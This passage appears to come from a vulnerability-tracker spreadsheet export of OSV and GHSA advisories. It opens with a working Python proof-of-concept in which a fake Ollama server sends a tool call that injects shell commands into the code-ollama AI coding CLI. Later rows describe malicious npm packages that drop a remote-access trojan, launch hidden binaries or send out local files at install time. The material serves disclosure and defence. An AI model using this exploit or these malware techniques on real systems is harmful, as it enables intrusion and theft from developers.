# ── Copy source and build ──────────────────────────────────────────────────────
COPY repo/ ./
# Produces /app/dist/cli.js — the bundled CLI entrypoint
RUN npm run build
# ── Runtime setup ─────────────────────────────────────────────────────────────
# code-ollama writes config to ~/.code-ollama; pre-create to avoid mkdir race
RUN mkdir -p /root/.code-ollama /workspace
COPY vuln-001/poc.py /poc.py
WORKDIR /workspace
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
Proof of Concept: VULN-001 — grep_search Command Injection (CWE-78)
Repository : ai-action/code-ollama v0.36.0
Sink       : src/utils/tools/filesystem/grep.ts:65
             execShell(`rg ... "${escapedPattern}" "${escapedDirPath}"`)
Attack path: malicious Ollama server -&gt; tool_call.arguments.pattern
             -&gt; grepSearch() -&gt; execShell() -&gt; child_process.exec()
Only `\\` and `"` are escaped; `$()` command substitution is NOT neutralized.
This PoC demonstrates that a rogue Ollama server can inject arbitrary shell
commands that execute as the local user running code-ollama.
Usage (inside Docker, called automatically by CMD):
    python3 /poc.py
Expected outcome:
    /tmp/poc-evidence is created with content matching INJECTED_CMD output.
"""
import json
import os
import subprocess
import sys
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
FAKE_SERVER_HOST = "127.0.0.1"
FAKE_SERVER_PORT = 11434
# The marker file written by the injected command — used as exploitation proof
MARKER_FILE = "/tmp/poc-evidence"
# Payload: $() command substitution that is NOT escaped by code-ollama's
# sanitization (only \\ and " are escaped, leaving $() intact).
# Writes output of `id` to MARKER_FILE to capture the running UID/GID.
INJECTED_CMD = f"$(id&gt;{MARKER_FILE})"
# Path argument for grep_search (must be a valid non-empty string)
TARGET_PATH = "/workspace"
# Tracks how many POST requests the fake server has received
_request_count = 0
_request_lock = threading.Lock()
# ---------------------------------------------------------------------------
# Fake Ollama HTTP server
# ---------------------------------------------------------------------------
class FakeOllamaHandler(BaseHTTPRequestHandler):
    """Minimal Ollama-compatible HTTP server for the PoC.
    First POST /api/chat  -&gt; returns a grep_search tool_call carrying the
                             injected pattern.
    Subsequent POSTs      -&gt; return a plain done response to terminate the
                             code-ollama tool-loop.
    """
    def log_message(self, fmt, *args):  # suppress default request logging
        pass
    # ------------------------------------------------------------------
    # GET — health-check (code-ollama / ollama-npm may call GET /)
    # ------------------------------------------------------------------
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Ollama is running")
    # ------------------------------------------------------------------
    # POST — chat streaming endpoint
    # ------------------------------------------------------------------
    def do_POST(self):
        global _request_count
        # Consume request body to avoid broken-pipe on the client side
        content_length = int(self.headers.get("Content-Length", 0))
        _ = self.rfile.read(content_length)
        with _request_lock:
            _request_count += 1
            current_request = _request_count
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if current_request == 1:
            # ---------------------------------------------------------------
            # First request: inject malicious grep_search tool call
            # The `arguments` object is passed verbatim through the ollama-npm
            # library and reaches grepSearch(pattern, path) in grep.ts.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  f"sending malicious grep_search tool_call")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "",
                    "tool_calls": [{
                        "function": {
                            "name": "grep_search",
                            # pattern and path are the two required string args
                            # validated by validateArgs() in dispatcher.ts
                            "arguments": {
                                "pattern": INJECTED_CMD,
                                "path": TARGET_PATH,
                            },
                        }
                    }],
                },
                "done": True,
                "done_reason": "stop",
            }
        else:
            # ---------------------------------------------------------------
            # Subsequent requests: plain text to terminate the tool loop.
            # No tool_calls -&gt; nextMessages stays null -&gt; processRunStream
            # returns after checking hasUncalledToolIntent (no match on
            # "Done.") so the CLI exits cleanly.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  "sending done/stop response")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "Done.",
                },
                "done": True,
                "done_reason": "stop",
            }
        self.wfile.write((json.dumps(chunk) + "\n").encode())
        self.wfile.flush()
def start_fake_server():
    """Start the fake Ollama server in a daemon thread."""
    server = HTTPServer((FAKE_SERVER_HOST, FAKE_SERVER_PORT), FakeOllamaHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
# ---------------------------------------------------------------------------
# Main orchestration
# ---------------------------------------------------------------------------
def main():
    print("=" * 65)
    print("VULN-001: grep_search Command Injection PoC (CWE-78)")
    print("Target : ai-action/code-ollama v0.36.0")
    print("Sink   : src/utils/tools/filesystem/grep.ts:65")
    print("=" * 65)
    print()
    print(f"[*] Payload  : {INJECTED_CMD}")
    print(f"[*] Marker   : {MARKER_FILE}")
    print()
    # Clean up any leftover marker from a previous run
    if os.path.exists(MARKER_FILE):
        os.unlink(MARKER_FILE)
        print(f"[*] Removed stale marker file: {MARKER_FILE}")
    # -----------------------------------------------------------------------
    # 1. Start the fake Ollama server
    # -----------------------------------------------------------------------
    print(f"[*] Starting fake Ollama server on "
          f"{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT} ...")
    start_fake_server()
    time.sleep(0.4)   # give the server socket time to bind
    # -----------------------------------------------------------------------
    # 2. Run code-ollama with OLLAMA_HOST pointing to the fake server
    #    --trust skips the interactive directory-trust prompt (src/cli.ts:214)
    # -----------------------------------------------------------------------
    env = os.environ.copy()
    env["OLLAMA_HOST"] = f"http://{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT}"
    # Use the compiled CLI bundle produced by `npm run build` in the Dockerfile
    cmd = [
        "node", "/app/dist/cli.js",
        "run", "--trust", "fake", "search the code",
    ]
    print(f"[*] Executing: {' '.join(cmd)}")
    print(f"[*] OLLAMA_HOST={env['OLLAMA_HOST']}")
    print()
    try:
        result = subprocess.run(
            cmd,
            env=env,
            stdin=subprocess.DEVNULL,   # no TTY / interactive input needed
            capture_output=True,
            text=True,
            timeout=60,
            cwd="/workspace",
        )
    except subprocess.TimeoutExpired:
        print("[-] code-ollama subprocess timed out after 60 s")
        sys.exit(1)
    print("--- code-ollama stdout ---")
    print(result.stdout[:3000] if result.stdout else "(empty)")
    print("--- code-ollama stderr ---")
    print(result.stderr[:3000] if result.stderr else "(empty)")
    print(f"--- exit code: {result.returncode} ---")
    print()
    # -----------------------------------------------------------------------
    # 3. Verify exploitation: check for the marker file
    # -----------------------------------------------------------------------
    if os.path.exists(MARKER_FILE):
        evidence = open(MARKER_FILE).read().strip()
        print("[+] ============================================================")
        print("[+] EXPLOITATION CONFIRMED")
        print("[+] ============================================================")
        print(f"[+] Marker file : {MARKER_FILE}")
        print(f"[+] Contents    : {evidence!r}")
        print("[+] Explanation : The $() command substitution inside the")
        print("[+]   grep_search pattern was NOT escaped by code-ollama's")
        print("[+]   sanitizer (grep.ts:58-63 only strips \\ and \").")
        print("[+]   execShell() passed the raw string to child_process.exec()")
        print("[+]   which ran it through /bin/sh, executing the injected")
        print("[+]   command as the current user.")
        print("[+] ============================================================")
        sys.exit(0)
    else:
        print("[-] ============================================================")
        print("[-] EXPLOITATION FAILED")
        print(f"[-] Expected marker file NOT found: {MARKER_FILE}")
        print("[-] Possible causes:")
        print("[-]   - ollama-npm parsed tool_call.arguments differently")
        print("[-]   - The pattern was sanitized before reaching execShell()")
        print("[-]   - ripgrep is not installed so the fallback path was taken")
        print("[-]   - The shell used does not support $() substitution")
        print("[-] ============================================================")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>GHSA-65gf-jmp3-4wrc</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:wbnr-probe-visible-check</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (a1f50ae8c3560fd6aedcceecf9e5289ed72c06bd746e21c4925b402c5d1ef3f9)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6" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17212</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>GHSA-865f-pwj5-p2c5</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/design-kit</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c3b05ae1cf2f1c184b793a46f4bebd59f7945ef1f671c4e6bd64ee946c416e2b)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7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17204</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>GHSA-94r6-cxjq-fq4r</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/lottiefiles-loader</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr"/>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (2f4124e4c91354a00657c25874fb6b9f762438eee2ecd1d8b686af3d4d4ea8c9)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8" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17205</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>GHSA-9f7c-6fp7-9g6x</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>npm:kjj81</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr"/>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (73eb4923beefd1002ed194dadf8c7712ed082fbd0d9dcdfba1db3a02e1fa82ef)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9" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>GHSA-cxrh-669r-w2g9</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-kit</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr"/>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (db00b593e7fc0c9c362e06fce588b1fa25a695114032504a7d6c72f5141f39ae)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0" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17221</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>GHSA-fm5g-6rr8-p9vq</t>
        </is>
      </c>
      <c r="D61" s="5" t="inlineStr"/>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="inlineStr"/>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-sdk</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr"/>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f0ca45fda7abd51edfeef37be6d19b4070788180b7625f16354223d81dae4d45)
The preinstall.cjs lifecycle script embeds a base64-encoded, zlib-compressed Windows PE (~257KB) as a string literal. On `npm install`, the script decodes and decompresses the blob, writes the resulting executable to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe (masquerading as the legitimate Windows conhost binary), and spawns it detached with stdio ignored and windowsHide set to true, executing attacker-controlled native code on the installer's Windows machine with no user interaction. Decoded payload strings reference github.com/syskiel/kntrat-e and the IP 65.87.7.132, consistent with a native RAT-family tool. The package's advertised purpose is an AI SDK; a bundled native Windows executable dropped at install time is unrelated to that purpose and is delivered through multi-layer obfuscation (base64 + zlib + string-literal embedding) inside the lifecycle hook.
## Source: ghsa-malware (6173d4941c91c361332072d4542cc10d3cefb945bc40a75ab83e07ffdc2fdb77)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1" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17219</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>GHSA-jhjp-4c2q-xmx4</t>
        </is>
      </c>
      <c r="D62" s="5" t="inlineStr"/>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="inlineStr"/>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>github, go, gin</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/falcosecurity/plugins/plugins/k8saudit, Go:github.com/falcosecurity/plugins/plugins/k8saudit-aks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-eks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-gke, Go:github.com/falcosecurity/plugins/plugins/k8saudit-ovh</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr">
        <is>
          <t>0.12.0, 0.18.0, 0.6.0, 0.9.0</t>
        </is>
      </c>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr"/>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>k8saudit shipped rules do not detect privileged/sensitive settings on init or ephemeral containers in github.com/falcosecurity/plugins/plugins/k8saudit</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6538</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>GHSA-jxw5-69p3-hpm4</t>
        </is>
      </c>
      <c r="D63" s="5" t="inlineStr"/>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="inlineStr"/>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>npm:native-runner</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr"/>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c057973da17ec629b4cd8c10a2b74108761f4a9ad4a1a31b280031da1f7139ca)
On `require('native-runner')`, a top-level IIFE in index.js polls for up to two minutes for a file at %APPDATA%\Microsoft\Windows\node_runtime_helper.exe and, once present, spawns it via child_process.spawn with {detached:true, windowsHide:true, stdio:'ignore'} and unref's the child, so the process outlives the importing Node process with no visible window and no captured output. This launcher is not part of the package's advertised API (README describes only `runBinary`/`runDetached`) and fires purely as a side effect of import. The staging directory %APPDATA%\Microsoft\Windows is chosen to resemble a legitimate Windows system location. The manifest declares a single dependency, `img-to-native@^1.0.0`, which is never require()'d by the shipped source; its only role in the install graph is to place the binary that this package then launches. Together the two packages form a drop-and-execute chain: installing and importing native-runner pulls in img-to-native, which stages node_runtime_helper.exe at the hardcoded path, and native-runner's import-time IIFE then executes that opaque binary hidden and detached on the installer's machine.
## Source: ghsa-malware (4eb077250ca4da76df88e49a2c314e67cb58761ae1cbffa1aa7742878d042a44)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3" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17218</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>GHSA-mh9w-qr45-6wrq</t>
        </is>
      </c>
      <c r="D64" s="5" t="inlineStr"/>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="inlineStr"/>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>npm, vite, gin</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>npm:vite-plugin-crypto</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr"/>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54ee82c069dcdf259199f5844c6ff46be3020d79609ff7b7b8ebc82017c59b2c)
vite-plugin-crypto@1.0.2 exposes a Vite plugin factory whose body concatenates three option fields — `secret`, `salt`, and `iv` — into a single string and passes it to `System.import(...)` from the `systemjs` runtime module loader, discarding the returned promise with `.then(() =&gt; {})`. Only `secret` is used by the advertised AES-GCM `encrypt()` path; `salt` and `iv` are declared on the options type but are absent from the documented options table and are unused by the real crypto code (which generates its own random salt/IV per call). The concatenated string is treated as a module specifier by SystemJS, which resolves URLs and executes fetched JavaScript, so whoever controls these option values obtains arbitrary JavaScript execution on the Vite build/dev host each time the config is loaded. Pulling in a browser-oriented dynamic module loader as the package's only runtime dependency, naming the concatenated input `derivedSecret`, and swallowing the promise frame the remote-loader call as a benign key-derivation step. Base64 decoding in dist/index.cjs and dist/index.js is used within the AES-GCM helper. The trigger fires at plugin construction during `vite build` / `vite dev`.
## Source: ghsa-malware (fdaf333e613f70df12ceaf378093d996a4bc1dd4df1a6350c4848a5de0fb83e7)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4" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17222</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>GHSA-pm4h-xrhq-vh62</t>
        </is>
      </c>
      <c r="D65" s="5" t="inlineStr"/>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="inlineStr"/>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>npm:kalasnik-npm-simple-test</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr"/>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f1463688412306d5d6f791bb036bea59aeb7251a3044a52c57119768f27cd463)
The package's postinstall script send_data.js runs automatically on npm install. It reads C:\temp\test.txt from the installer's filesystem and POSTs the contents over plain HTTP to a hardcoded remote endpoint at 35.178.197.251:8080. Package metadata ("Simplified test", author "Purple", UNLICENSED) is consistent with a PoC exfiltration harness rather than a legitimate library.
## Source: ghsa-malware (892887d57c2d036af7c30a0a27995006f042229dd0959c7653a5560054277cbe)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5" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17206</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>GHSA-pqvc-prrc-mv45</t>
        </is>
      </c>
      <c r="D66" s="5" t="inlineStr"/>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="inlineStr"/>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>npm:uuid-date</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr"/>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1794c1dba5ffb902f0c8011a60990baff7cf5ebc1f90ab634937734944696995)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6" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17210</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>GHSA-pv7p-ghgv-268x</t>
        </is>
      </c>
      <c r="D67" s="5" t="inlineStr"/>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="inlineStr"/>
